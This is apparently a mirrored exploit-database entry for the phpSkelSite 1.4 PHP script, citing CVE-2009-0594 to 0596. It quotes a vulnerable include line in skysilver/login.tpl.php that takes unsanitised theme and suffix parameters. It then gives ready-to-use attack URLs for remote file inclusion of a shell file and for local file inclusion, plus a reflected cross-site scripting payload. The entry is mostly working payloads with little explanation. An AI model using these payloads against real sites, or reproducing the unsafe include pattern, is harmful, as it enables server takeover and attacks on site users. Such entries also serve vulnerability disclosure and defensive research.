[] NeoSense
E X P L O I T S
title author type platform port cve id

phpskelsite 1.4 - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting

Author: ahmadbady
type: webapps
platform: php
port: 
date_added: 2009-01-01 
date_updated: 2017-01-23 
verified: 1 
codes: OSVDB-51215;CVE-2009-0596;OSVDB-51214;CVE-2009-0595;OSVDB-51213;CVE-2009-0594 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comphpSkelSite_v1.4.zip
-----------------:RFI/LFI/xss:-----------------
-------------------------------------------
script:phpSkelSite

------------------------------------------------------------------
download from:http://apmuthu.tripod.com/files/phpSkelSite_v1.4.zip

------------------------------------------------------------------

........................................................
vul:/skysilver/login.tpl.php line 1

<? include $theme.'/pageheading'.$TplSuffix ; ?>


------------------------------------------------------
Rfi:

http://127.0.0.1/path/skysilver/login.tpl.php?theme=[shell.txt?]

Lfi:

http://127.0.0.1/path/skysilver/login.tpl.php?TplSuffix=[lfi]

***************************************************
xss:
http://127.0.0.1/path/index.php/>"><ScRiPt>alert('ahmadbady')</ScRiPt>
***************************************************
---------------------
Author: ahmadbady
---------------------

# milw0rm.com [2009-01-02]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.